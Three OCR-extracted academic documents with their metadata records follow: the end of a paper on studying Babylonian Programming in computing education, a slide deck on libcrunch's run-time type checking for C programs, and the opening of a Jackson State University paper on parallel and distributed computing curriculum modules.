Babylonian/S decrease frustration with the task in students? - Does Babylonian/S improve the confidence of the students in their solution? - Does Babylonian/S influence how long it takes students to finish a given task? Participants. Our target demographic for this study are undergraduate students in their fourth, or a later, semester of study from our faculty. Because the participants are undergraduate students, we expect them to be at a relative novice level of programming that are still learning about some of its core concepts. Because we are familiar with the teaching program of our faculty, we can anticipate which base concepts the students have already encountered in previous courses and prepare tasks accordingly. In particular, we can plan on all students having at least worked a little with a Squeak/Smalltalk environment in a mandatory lecture in their third semester. Operationalization. In this study, we will equate “learning effectiveness” to whether students are able to correctly solve the given task. We want to enable students to correctly understand and answer the given tasks without, if possible, slowing down the task solving process so considerably that it becomes unviable in actual courses. To measure the impact on learning effectiveness, we plan to record the time students needed to create their solution as well as if their solution provides the behavior or functionality required by the task. But since education is not exclusively focused on the results but also on how students achieve these results and how sustainable their learning experience is, we also plan to study their "programming experience" with post-task questionnaires. We aim to provide question that gauge how frustrating completing the task was, how “fun” or engaging it was, and how high their confidence in their result and understanding of the system is. To understand some underlying aspects of our environment, we also plan to record how often participants switch context (in this case, methods or tool windows) and how often as well as why they use Babylonian features. Context switches usually negatively impact performance, as developers need to do a mental switch; if Babylonian reduces the need for such switches, that might also influence participant performance. The measures on our Babylonian/S tools will provide us some background information on how they influenced the participants; for instance, if a participant decides not to use Babylonian tools even if provided, a performance boost in that task would not be the result of our system. Lastly, while we will be able to predict some characteristics and pre-experience of the expected participants, their exact knowledge may vary. Participants may for instance have additional experience from hobby projects or jobs outside of the university syllabus. Also, other factors such as exactly how many semesters the students have been studying, which courses they successfully passed, and their own confidence in their skills may vary as well. Because of these possible variations, we will include a questionnaire for the participants that besides demographical data will collect data on their experience and prior knowledge. **Task Design.** This study will include multiple educational tasks suitable for our target demographic, e.g., feature creation tasks for a small game, a domain students would be familiar with from previous courses. The exact tasks and domain depends on the insights from our first study and previously outlined criteria[11] to ensure adequate complexity and answer times. To get insights on each educational task with both of our experiment conditions, we plan conduct this study as a factorial experiment and as a within-subject study. Ideal would be tasks whose complexity is simple enough for the participants to grasp in a session, while being complex to include e.g. dynamic behavior or state. Enabling an understanding of dynamic behavior of a system is both a core potential of Babylonian Programming as well as integral to our targeted participants, computer science students that just finished their programming introduction courses. 4 Outlook **Study implementation.** First, we will design a concrete plan for our first study design. We will then recruit fitting participants and run the study. As this is an exploratory study, we might change the study set-up between study runs based on new insights. The study results will then both be used to alter and improve Babylonian/S and gather knowledge about the applicability and usefulness of Babylonian Programming. The Environment used for the study will be equipped with fine-grained monitoring facilities that allow us to learn whether, when, and how often participants interacted with certain features of the base system and the elements introduced by BP. Using the insights gained from our first study, we will then design tasks for and create a concrete plan for study. This set-up will be tested with a few students in a pilot study to find and fix flaws or problems that might occur. The finalized plan will then be used to run the study with recruited undergraduate students. Based on the results, further studies could potentially be designed. For example, an entire seminar or lecture using a BP-enabled programming environment in a longitudinal study. **Expected improvements.** We expect that such a study helps us improve several aspects of BP itself, our Babylonian/S implementation, and the opportunities students have to learn a novel programming system like Smalltalk. A common issue with tools that deviate from the standard tool set is that they are unexpected and need to be designed with affordance in mind. When viewed under the educational lens, we expect to be able to tell helpful from less helpful features, learn how to make Examples and the tools to work with them more discoverable, which obstacles might prevent learners from creating their own Examples, and eventually arrive at an environment where Examples do not feel like a separate tool. While the quality of the BP environment and the examples provided by teachers can confound learning effects, our double study is designed to mitigate this effect in the first study by allowing us to run the second study with a BP-enabled environment devoid of serious flaws detected earlier. Conclusion The evolving integration of examples into programming environments increasingly affords teachers and learners opportunities to illustrate abstract programs with concrete examples. Babylonian programming is a newer technique that promises to empower teachers and learners due to the proximity of examples to code, liveness, and applicability to larger programs. In this paper, we outlined the opportunities that come with Babylonian Programming to support mental simulation, sub-goal formation, and self-explanation in the context of educational material and exercises. We subsequently proposed an early design for two studies aimed at exploring this promise and elaborated on the necessary preparations, potential outcomes and consequences for both teaching and programming environments. Acknowledgments This work is supported by the HPI-MIT "Designing for Sustainability" research program3. References --- 3https://hpi.de/en/research/cooperations-partners/research-program-designing-for-sustainability.html Received 2023-07-17; accepted 2023-08-07
{"Source-Url": "https://www.hpi.uni-potsdam.de/hirschfeld/publications/media/KrebsMattisReinHirschfeld_2023_TowardStudyingExampleBasedLiveProgrammingInCsSeEducation_AcmDL.pdf", "len_cl100k_base": 5255, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 24599, "total-output-tokens": 7226, "length": "2e12", "weborganizer": {"__label__adult": 0.0008535385131835938, "__label__art_design": 0.0010709762573242188, "__label__crime_law": 0.0008087158203125, "__label__education_jobs": 0.08892822265625, "__label__entertainment": 0.0001615285873413086, "__label__fashion_beauty": 0.0004243850708007813, "__label__finance_business": 0.00054931640625, "__label__food_dining": 0.0010175704956054688, "__label__games": 0.0012359619140625, "__label__hardware": 0.0012807846069335938, "__label__health": 0.0010137557983398438, "__label__history": 0.0006241798400878906, "__label__home_hobbies": 0.0003178119659423828, "__label__industrial": 0.0008845329284667969, "__label__literature": 0.000934123992919922, "__label__politics": 0.0007624626159667969, "__label__religion": 0.0011730194091796875, "__label__science_tech": 0.0145721435546875, "__label__social_life": 0.0004374980926513672, "__label__software": 0.006633758544921875, "__label__software_dev": 0.87353515625, "__label__sports_fitness": 0.0007710456848144531, "__label__transportation": 0.0013742446899414062, "__label__travel": 0.00048279762268066406}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32485, 0.02328]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32485, 0.92178]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32485, 0.9213]], "google_gemma-3-12b-it_contains_pii": [[0, 4083, false], [4083, 7878, null], [7878, 12846, null], [12846, 18298, null], [18298, 20438, null], [20438, 24111, null], [24111, 29663, null], [29663, 32485, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4083, true], [4083, 7878, null], [7878, 12846, null], [12846, 18298, null], [18298, 20438, null], [20438, 24111, null], [24111, 29663, null], [29663, 32485, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32485, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 32485, null]], "pdf_page_numbers": [[0, 4083, 1], [4083, 7878, 2], [7878, 12846, 3], [12846, 18298, 4], [18298, 20438, 5], [20438, 24111, 6], [24111, 29663, 7], [29663, 32485, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32485, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
1762a763ff58980f1896305ba8700d1d724519df
Run-time type checking of whole programs and other stories. Stephen Kell stephen.kell@cl.cam.ac.uk Computer Laboratory University of Cambridge if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (struct commit *)obj)) return -1; return 0; } if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (struct commit *)obj)) return -1; return 0; } /libcrunch... – p.2/44 Wanted (naive version): check this! ```c if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (struct commit *)obj)) return -1; return 0; } ``` (at run time) But also wanted: - binary-compatible - source-compatible - reasonable performance - avoid being C-specific! * mostly… Wanted (naive version): check this! ```c if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (struct commit *)obj)) return -1; return 0; } \* CHECK this \* (check at run time) ``` But also wanted: - binary-compatible - source-compatible - reasonable performance - avoid being C-specific!\* \* mostly... \* in fact, a general-purpose “dynamic” run-time (ask me) I describe libcrunch, which is - an infrastructure for run-time type checking - encodes type checks as assertions over reified data types - per-language front-ends (C; C++, Fortran, ...) - support idiomatic unsafe code, unmodified* - target: safe assuming memory safety - no binary interface changes (* but sometimes out-of-band guidance helps) Why care about unsafe languages? - fine control of resource utilisation - talk directly to operating system - talk directly to hardware - freedom to \{simulate, violate\} abstractions - re-use existing code (a *huge* investment) - unsafe is the "hard / general" case What is “type-correctness”? “Type” means “data type” - instantiate = allocate - concerns storage - “correct”: reads and writes respect allocated data type - cf. memory-correct (spatial, temporal) Languages can be “safe”; programs can be “correct” The user’s eye view $ crunchcc -o myprog ... # + other front-ends The user’s eye view - $ crunchcc -o myprog ... # + other front-ends - $ ./myprog # runs normally The user’s eye view - $ crunchcc -o myprog ... # + other front-ends - $ ./myprog # runs normally - $ LD_PRELOAD=libcrunch.so ./myprog # does checks The user’s eye view - $ crunchcc -o myprog ... # + other front-ends - $ ./myprog # runs normally - $ LD_PRELOAD=libcrunch.so ./myprog # does checks - myprog: Failed __is_a_internal(0x5a1220, 0x413560 a.k.a. "uint$32") at 0x40dade, allocation was a heap block of int$32 originating at 0x40daa1 if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (struct commit *)obj)) return -1; return 0; } if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (assert( __is_a (obj, "struct_commit")), (struct commit *)obj)) return -1; return 0; } How it works for C code, in a nutshell ```c if (obj->type == OBJ_COMMIT) { if (process_commit(walker, (assert(_is_a(obj, "struct_commit")), (struct commit *)obj)) return -1; return 0; } ``` Want a runtime with magical powers - tracking allocations - with type info - efficiently - → fast _is_a() function What does a C compiler not check? ```c int a = 1; char *b = ...; void f(double); f(a); // okay —- compiler adds conversion b = a; // not okay —- compiler tells us f(b); // not okay —- compiler tells us f(*(double*)b); // depends... ``` Want to check what the compiler punts on - use of pointers (“distant” accesses) - also (rarer): unions, varargs functions Memory-correctness vs type-correctness (1) Pointer-y things checked by existing tools - spatial m-c – bounds (SoftBound, Asan) - temporal_1 m-c – use-after-free (CETS, Asan) - temporal_2 m-c – initializedness (Memcheck, Msan) - nothing to do with types! Slow! - metadata per \{value, pointer\} - check on use Memory-correctness vs type-correctness (1) Pointer-y things checked by existing tools - spatial m-c – bounds (SoftBound, Asan) - temporal₁ m-c – use-after-free (CETS, Asan) - temporal₂ m-c – initializedness (Memcheck, Msan) - nothing to do with types! Slow! Faster: - metadata per \{value, pointer\} allocation - check on use create // a check over object metadata... guards creation of the pointer (assert(_is_a(obj, "struct_commit")), (struct commit *)obj) For now, assume memory-correct execution - “also use one of those other tools” Then do only the additional checks s.t. - all memory accesses respect memory’s *allocated type* ... which, for C, can be done by maintaining an invariant: - every live pointer respects its *contract* (pointee type) - must also check unsafe loads/stores *not* via pointers - unions, varargs What data type is being `malloc()`’d? - ... guess from use of `sizeof` - dump *typed allocation sites* from compiler - guessing is moderately clever - e.g. `malloc(sizeof (Blah) + n * sizeof (Foo))` --- source tree ``` main.c widget.c util.c ... ``` CIL-based compiler front-end ``` main.i .allocs widget.i .allocs util.i .allocs ... ``` **dump allocation sites (dumpallocs)** **instrument pointer casts** `libcrunch`... structure “subtyping” via containment function pointers (most of the time) void pointers char pointers integer ↔ pointer casts type-differing aliases custom allocators, memory pools etc. Hierarchical model of allocations mmap(), sbrk() libc malloc() - obstack (+ malloc) client code - custom malloc() - gslice client code client code client code client code client code client code client code custom heap (e.g. Hotspot GC) Somewhat difficult cases Solved: - opaque types - complex use of sizeof - structure “subtyping” via prefixing Give up: - avoidance of sizeof - address-taken union members - non-procedurally abstracted object allocation/re-use The remaining awkwards - alloc - unions - varargs - generic use of non-generic pointers (void**, ...) - casts of function pointers to non-supertypes The remaining awkwards - `alloca` - `unions` - `varargs` - generic use of non-generic pointers (`void**`, …) - casts of function pointers to non-supertypes All solved/solvable with some extra instrumentation - supply our own `alloca` - instrument writes to unions - instrument calls via `varargs lvalues`; use own `va_arg` - instrument writes through `void**` (check invariant!) - optionally instr. all indirect calls Idealised view of libcrunch toolchain deployed binaries (with data-type assertions) \[ \text{/bin/foo} \\ \text{/lib/libxyz.so} \] deployed binaries debugging information (with allocation site information) \[ \text{/bin/.debug/foo} \\ \text{/lib/.debug/libxyz.so} \] debugging information precompute unique data types \[ \text{libcrunch.so} \\ \text{/bin/.uniqtyp/foo.so} \] precompute unique data types load, link and run (ld.so) \[ \text{program image} \] heap_index \[ 0x\text{deadbeef}, \text{"Widget"?} \] __is_a uniqtypes \[ \text{true} \] ### A model of data types: DWARF debugging info ```bash $ cc -g -o hello hello.c && readelf -wi hello | column ``` <table> <thead> <tr> <th>TAG</th> <th>Value</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>AT_language</td> <td>1 (ANSI C)</td> <td>Language</td> </tr> <tr> <td>AT_name</td> <td>hello.c</td> <td>Name</td> </tr> <tr> <td>AT_low_pc</td> <td>0x4004f4</td> <td>Low PC</td> </tr> <tr> <td>AT_high_pc</td> <td>0x400514</td> <td>High PC</td> </tr> <tr> <td>AT_language</td> <td>1 (ANSI C)</td> <td>Language</td> </tr> <tr> <td>AT_name</td> <td>hello.c</td> <td>Name</td> </tr> <tr> <td>AT_low_pc</td> <td>0x4004f4</td> <td>Low PC</td> </tr> <tr> <td>AT_high_pc</td> <td>0x400514</td> <td>High PC</td> </tr> <tr> <td>AT_language</td> <td>1 (ANSI C)</td> <td>Language</td> </tr> <tr> <td>AT_name</td> <td>hello.c</td> <td>Name</td> </tr> <tr> <td>AT_low_pc</td> <td>0x4004f4</td> <td>Low PC</td> </tr> <tr> <td>AT_high_pc</td> <td>0x400514</td> <td>High PC</td> </tr> </tbody> </table> ### TAG_base_type | AT_byte_size | 4 | Byte size | | AT_encoding | 5 (signed) | Encoding | | AT_name | int | Name | ### TAG_pointer_type | AT_byte_size | 8 | Byte size | | AT_type | <0x2b5> | Type | | AT_name | argc | Name | | AT_byte_size | 8 | Byte size | | AT_type | <0x2b5> | Type | | AT_location | fbreg - 20 | Location | ### TAG_base_type | AT_byte_size | 1 | Byte size | | AT_encoding | 6 (char) | Encoding | | AT_name | char | Name | | AT_byte_size | 1 | Byte size | | AT_encoding | 6 (char) | Encoding | | AT_name | char | Name | ### TAG_formal_parameter | AT_type | <0xc5> | Type | | AT_location | fbreg - 32 | Location | | AT_type | <0x7ae> | Type | | AT_location | fbreg - 32 | Location | libcrunch... – p.17/44 Type info for each allocation What is an allocation? - static memory: `mmap`’d program binaries - heap memory: “anonymous” `mmap`pings - returned by `malloc()` – “level 1” allocation - returned by `mmap()` – “level 0” allocation - (maybe) memory issued by user allocators... - stack memory We keep specialised *indexes* for each kind of memory... **Representation of data types** ```c struct ellipse { double maj, min; struct { double x, y; } ctr; }; ``` - use the linker to keep them unique - uniqueness → “exact type” test is a pointer comparison - `__is_a()` is a short search What happens at run time? program image __is_a(0xdeadbee8, __uniqtype_double) → lookup(0xdeadbee8) → allocsite: 0x8901234, → offset: 0x8 lookup(0x8901234) → __is_a → &__uniqtype_ellipse find( &__uniqtype_double, &__uniqtype_ellipse, 0x8) → found → heap_index → allocsites → uniqtypes true libcrunch... – p.20/44 Getting from objects to their metadata Recall: binary & source compatibility requirements - can’t embed metadata into objects - can’t change object layouts at all! - → need out-of-band ("disjoint") metadata Pointers can point anywhere inside an object - which may be stack-, static- or heap-allocated Why the heap case is difficult, cf. virtual machine heaps Native objects are trees; no descriptive headers! VM-style objects: “no interior pointers” To solve the heap case... - we’ll need some `malloc()` hooks... - which keep an index of the heap - in a `memtable`—efficient `address-keyed` associative map - must support (some) range queries - storing object’s metadata Memtables make aggressive use of virtual memory Indexing heap chunks Inspired by free chunk binning in Doug Lea’s `malloc`... Inspired by free chunk binning in Doug Lea’s *malloc*... but index *allocated* chunks binned by *address* How many bins? Each bin is a linked list of heap chunks - thread next/prev pointers through allocated chunks... - also store metadata (allocation site address) - overhead per chunk: one word + two bytes Finding chunk is $O(n)$ given bin of size $n$ - → want bins to be as small as possible - Q: how many bins can we have? - A: lots... really, *lots*! Really, how big? Bin index resembles a linear page table. Exploit - sparseness of address space usage - lazy memory commit on “modern OSes” (Linux) Reasonable tuning for malloc heaps on Intel architectures: - one bin covers 512 bytes of VAS - each bin’s head pointer takes one byte in the index - covering $n$-bit AS requires $2^{n-9}$-byte bin index Big picture of our heap memtable index by high-order bits of virtual address entries are one byte, each covering 512B of heap interior pointer lookups may require backward search pointers encoded compactly as local offsets (6 bits) instrumentation adds a trailer to each heap chunk entries are one byte, each covering 512B of heap interior pointer lookups may require backward search pointers encoded compactly as local offsets (6 bits) instrumentation adds a trailer to each heap chunk ... Indexing the heap with a memtable is... - more VAS-efficient than shadow space (SoftBound) - supports > 1 index, unlike placement-based approaches Memtables are versatile - buckets don’t have to be linked lists - can tune size / coverage... We also use memtables to - index every mapped page in the process (“level 0”) - index “deep” (level 2+) allocations - index static allocations - index the stack (map PC to frame uniqtype) Remind me: what happens at run time? program image __is_a(0xdeadbee8, __uniqtype_double)? lookup(0xdeadbee8) allocate: 0x8901234, offset: 0x8 lookup(0x8901234) __is_a &__uniqtype_ellipse find( &__uniqtype_double, &__uniqtype_ellipse, 0x8) found heap_index allocaites uniqtypes true libcrunch... – p.29/44 __is_a, containment... Pointer $p$ might satisfy __is_a($p$, $T$) for $T_0$, $T_1$, ... Consider “what is” - &my_ellipse - &my_ellipse.ctr - ... (Subclassing is usually implemented this way.) __is_a is a nominal check, but we can also write - __like_a – “structural” (unwrap one level) - __refines – padded open unions (à la sockaddr) - __named_a – opaque workaround ... or invent your own! Recap What we’ve just seen is - a runtime system for evaluating type checks - fast - flexible - a “whole program” design - language-neutral - binary compatible What about *source* compatibility? We also interfere with linking: - link in uniqtypes referred to by each .o’s checks - hook allocation functions - ... distinguishing wrappers from “deep” allocators Currently provide options in environment variables... ``` LIBCRUNCH_ALLOC_FNS="xcalloc(zZ) xmalloc(Z) xrealloc(pZ) xmallocz(Z)" LIBCRUNCH.LAZY_HEAP_TYPES="__PTR_void" ``` ## How fast is it? SPEC CPU2006 results <table> <thead> <tr> <th>benchmark</th> <th>normal/s</th> <th>crunch</th> <th>nopreload</th> <th>just allocs</th> </tr> </thead> <tbody> <tr> <td>perlbench</td> <td>1.48</td> <td>+31 %</td> <td>–</td> <td>+3%</td> </tr> <tr> <td>bzip2</td> <td>5.05</td> <td>+0 %</td> <td>+0%</td> <td>+0%</td> </tr> <tr> <td>mcf</td> <td>2.49</td> <td>+6.8%</td> <td>–1%</td> <td>+0%</td> </tr> <tr> <td>milc</td> <td>8.75</td> <td>+38 %</td> <td>+2%</td> <td>–1%</td> </tr> <tr> <td>gobmk</td> <td>14.5</td> <td>+13 %</td> <td>+1%</td> <td>+1%</td> </tr> <tr> <td>hmer</td> <td>2.13</td> <td>+8.5%</td> <td>+8%</td> <td>+0%</td> </tr> <tr> <td>sjeng</td> <td>3.25</td> <td>–2.2%</td> <td>–2%</td> <td>+0%</td> </tr> <tr> <td>h264ref</td> <td>10.0</td> <td>+5 %</td> <td>+5%</td> <td>+1%</td> </tr> <tr> <td>lbm</td> <td>3.43</td> <td>+24 %</td> <td>+0%</td> <td>+0%</td> </tr> <tr> <td>sphinx3</td> <td>1.58</td> <td>+15 %</td> <td>+2%</td> <td>+4%</td> </tr> <tr> <td>gcc</td> <td>0.989</td> <td>+289 %</td> <td>–</td> <td>+4%</td> </tr> </tbody> </table> Popular errors - sloppiness about signed vs unsigned - some user-level allocation behaviour - some cases of multiple indirection of `void` ```c void get_obj(struct Foo **out); void *opaque_obj; get_obj(&opaque_obj); ``` False negatives: - memory-incorrect programs - unions - over-coarse sloppification (e.g. `__like_a`) More case studies needed... neighbor = (int **) calloc (NDIRS, sizeof(int *)); // ... sort_eight_special ((void **) neighbor); // where void sort_eight_special (void **pt) { void *tt [8]; register int i; for (i=0;i<8;i++) tt[i]=pt[i]; for (i=XUP;i<=TUP;i++) {pt[i]=tt[2*i]; pt[OPP_DIR(i)]=tt[2*i+1];} } Generic pointers to pointers to non-generic pointers ``` PUBFUNC void dynarray_add(void ***ptab, int *nb_ptr, void *data) { /* ... */ /* every power of two we double array size */ if ( ((nb & (nb - 1)) == 0) ) { if (!nb) nb_alloc = 1; else nb_alloc = nb * 2; pp = tcc_realloc (pp, nb_alloc * sizeof(void *)); *ptab = pp; } /* ... */ } char **libs = NULL; /* ... */ dynarray_add((void ***)&libs, &nblibs, tcc_strdup(filename)); ``` typedef double LBM_Grid[SIZE_Z*SIZE_Y*SIZE_X*N_CELL_ENTRIES]; typedef LBM_Grid* LBM_GridPtr; #define MAGIC_CAST(v) ((unsigned int*) ((void*) (&(v)))) #define FLAG_VAR(v) unsigned int* const _aux_ = MAGIC_CAST(v) // ... #define TEST_FLAG(g,x,y,z,f) \ ((*MAGIC_CAST(GRID_ENTRY(g, x, y, z, FLAGS))) & (f)) #define SET_FLAG(g,x,y,z,f) \ {FLAG_VAR(GRID_ENTRY(g, x, y, z, FLAGS)); (*_aux_) |= (f);} #define FUNC_CALL(r) (((AttributeDef*)&(r))—>func_call) typedef struct Sym { int v; /* symbol token */ long r; /* associated register */ long c; /* associated number */ CType type; /* associated type */ struct Sym *next; /* next related symbol */ struct Sym *prev; /* prev symbol in stack */ struct Sym *prev_tok; /* previous symbol for this token */ } Sym; func_attr_t *func_call = FUNC_CALL(sym—>r); typedef int parse_opt_cb(const struct option *, const char *arg, int unset); static int stdin_cacheinfo_callback(struct parse_opt_ctx_t *ctx, const struct option *opt, int unset) { /* ... */ } struct option options[] = { /* ... */, {OPTION_LOWLEVEL_CALLBACK, 0, /* ...*/, (parse_opt_cb *) stdin_cacheinfo_callback }, /* ... */ }; if (value->kind > RTX_DOUBLE && value->un.addr.base != 0) switch (GET_CODE (value->un.addr.base)) { case SYMBOL_REF: /* Use the string’s address, not the SYMBOL_REF’s address, */ /* for the sake of addresses of library routines. */ value->un.addr.base = (rtx) XSTR (value->un.addr.base, 0); break; /* ... */ } libcrunch... – p.41/44 item -> util = xcalloc(sizeof(struct branch_info), 1); if (((* array4D) = (short****)calloc(idx, sizeof(short**))) == NULL) no_mem_exit("get_mem4Dshort::array4D"); Code is here: - https://github.com/stephenrkell/libcrunch and also - https://github.com/stephenrkell/libdwarfpp - https://github.com/stephenrkell/dwarfidl - https://github.com/stephenrkell/liballocs - https://github.com/stephenrkell/libsrk31c++ - ... will make a friendly download-and-build script soon Questions?
{"Source-Url": "https://www.cl.cam.ac.uk/~srk31/research/talks/kell14run-time-slides.pdf", "len_cl100k_base": 5377, "olmocr-version": "0.1.50", "pdf-total-pages": 55, "total-fallback-pages": 0, "total-input-tokens": 77603, "total-output-tokens": 7408, "length": "2e12", "weborganizer": {"__label__adult": 0.0003674030303955078, "__label__art_design": 0.0003211498260498047, "__label__crime_law": 0.00027942657470703125, "__label__education_jobs": 0.0003063678741455078, "__label__entertainment": 5.167722702026367e-05, "__label__fashion_beauty": 0.00013113021850585938, "__label__finance_business": 0.00012153387069702148, "__label__food_dining": 0.0003819465637207031, "__label__games": 0.0003795623779296875, "__label__hardware": 0.0009169578552246094, "__label__health": 0.0003726482391357422, "__label__history": 0.0001552104949951172, "__label__home_hobbies": 9.02414321899414e-05, "__label__industrial": 0.0002846717834472656, "__label__literature": 0.0001811981201171875, "__label__politics": 0.00024044513702392575, "__label__religion": 0.0004658699035644531, "__label__science_tech": 0.003841400146484375, "__label__social_life": 8.893013000488281e-05, "__label__software": 0.0033245086669921875, "__label__software_dev": 0.98681640625, "__label__sports_fitness": 0.0003070831298828125, "__label__transportation": 0.00036978721618652344, "__label__travel": 0.00019502639770507812}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 19082, 0.01462]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 19082, 0.14376]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 19082, 0.6354]], "google_gemma-3-12b-it_contains_pii": [[0, 145, false], [145, 265, null], [265, 409, null], [409, 711, null], [711, 1101, null], [1101, 1448, null], [1448, 1716, null], [1716, 1967, null], [1967, 2034, null], [2034, 2134, null], [2134, 2301, null], [2301, 2595, null], [2595, 2727, null], [2727, 2920, null], [2920, 3260, null], [3260, 3640, null], [3640, 3953, null], [3953, 4420, null], [4420, 4796, null], [4796, 5234, null], [5234, 5421, null], [5421, 5672, null], [5672, 5902, null], [5902, 6052, null], [6052, 6473, null], [6473, 7035, null], [7035, 10338, null], [10338, 10694, null], [10694, 10949, null], [10949, 11281, null], [11281, 11586, null], [11586, 11737, null], [11737, 12011, null], [12011, 12090, null], [12090, 12196, null], [12196, 12551, null], [12551, 12906, null], [12906, 13407, null], [13407, 13841, null], [13841, 14151, null], [14151, 14347, null], [14347, 14548, null], [14548, 14746, null], [14746, 15085, null], [15085, 15945, null], [15945, 16308, null], [16308, 16591, null], [16591, 17068, null], [17068, 17465, null], [17465, 17904, null], [17904, 18238, null], [18238, 18595, null], [18595, 18650, null], [18650, 18764, null], [18764, 19082, null]], "google_gemma-3-12b-it_is_public_document": [[0, 145, true], [145, 265, null], [265, 409, null], [409, 711, null], [711, 1101, null], [1101, 1448, null], [1448, 1716, null], [1716, 1967, null], [1967, 2034, null], [2034, 2134, null], [2134, 2301, null], [2301, 2595, null], [2595, 2727, null], [2727, 2920, null], [2920, 3260, null], [3260, 3640, null], [3640, 3953, null], [3953, 4420, null], [4420, 4796, null], [4796, 5234, null], [5234, 5421, null], [5421, 5672, null], [5672, 5902, null], [5902, 6052, null], [6052, 6473, null], [6473, 7035, null], [7035, 10338, null], [10338, 10694, null], [10694, 10949, null], [10949, 11281, null], [11281, 11586, null], [11586, 11737, null], [11737, 12011, null], [12011, 12090, null], [12090, 12196, null], [12196, 12551, null], [12551, 12906, null], [12906, 13407, null], [13407, 13841, null], [13841, 14151, null], [14151, 14347, null], [14347, 14548, null], [14548, 14746, null], [14746, 15085, null], [15085, 15945, null], [15945, 16308, null], [16308, 16591, null], [16591, 17068, null], [17068, 17465, null], [17465, 17904, null], [17904, 18238, null], [18238, 18595, null], [18595, 18650, null], [18650, 18764, null], [18764, 19082, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 19082, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 19082, null]], "pdf_page_numbers": [[0, 145, 1], [145, 265, 2], [265, 409, 3], [409, 711, 4], [711, 1101, 5], [1101, 1448, 6], [1448, 1716, 7], [1716, 1967, 8], [1967, 2034, 9], [2034, 2134, 10], [2134, 2301, 11], [2301, 2595, 12], [2595, 2727, 13], [2727, 2920, 14], [2920, 3260, 15], [3260, 3640, 16], [3640, 3953, 17], [3953, 4420, 18], [4420, 4796, 19], [4796, 5234, 20], [5234, 5421, 21], [5421, 5672, 22], [5672, 5902, 23], [5902, 6052, 24], [6052, 6473, 25], [6473, 7035, 26], [7035, 10338, 27], [10338, 10694, 28], [10694, 10949, 29], [10949, 11281, 30], [11281, 11586, 31], [11586, 11737, 32], [11737, 12011, 33], [12011, 12090, 34], [12090, 12196, 35], [12196, 12551, 36], [12551, 12906, 37], [12906, 13407, 38], [13407, 13841, 39], [13841, 14151, 40], [14151, 14347, 41], [14347, 14548, 42], [14548, 14746, 43], [14746, 15085, 44], [15085, 15945, 45], [15945, 16308, 46], [16308, 16591, 47], [16591, 17068, 48], [17068, 17465, 49], [17465, 17904, 50], [17904, 18238, 51], [18238, 18595, 52], [18595, 18650, 53], [18650, 18764, 54], [18764, 19082, 55]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 19082, 0.08348]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
61cccbb9949964188cb53cd46f160fe8d28b87fe
Incorporating PDC Modules into Computer Science Courses at Jackson State University Ali Abu El Humos, Sungbum Hong, Jacqueline Jackson, Xuejun Liang, Tzusheng Pei and Bernard Aldrich Department of Computer Science Jackson State University Jackson, MS 39217, USA Agenda • Background • Curriculum Changes • Early Adopting Courses • Students Feedback • PDC Modules Inclusion • Assessment Tools and Results • Conclusions and Future Work Background • Jackson State University (JSU) has a student population that is over 90% from under-represented groups • About 25% of our students are females • This NSF/IEEE-TCPP Curriculum Initiative award will therefore have a direct impact on minorities specifically in the Computer Science field Curriculum Changes • The computer science department at Jackson State University is updating its curriculum according to the new ABET guidelines. • The computer science new curriculum at JSU is a 125 credit-hour program of which 57 in computer science. • Some advanced computer architecture topics are moved to elective courses. This may prevent students from learning about important PDC topics such as 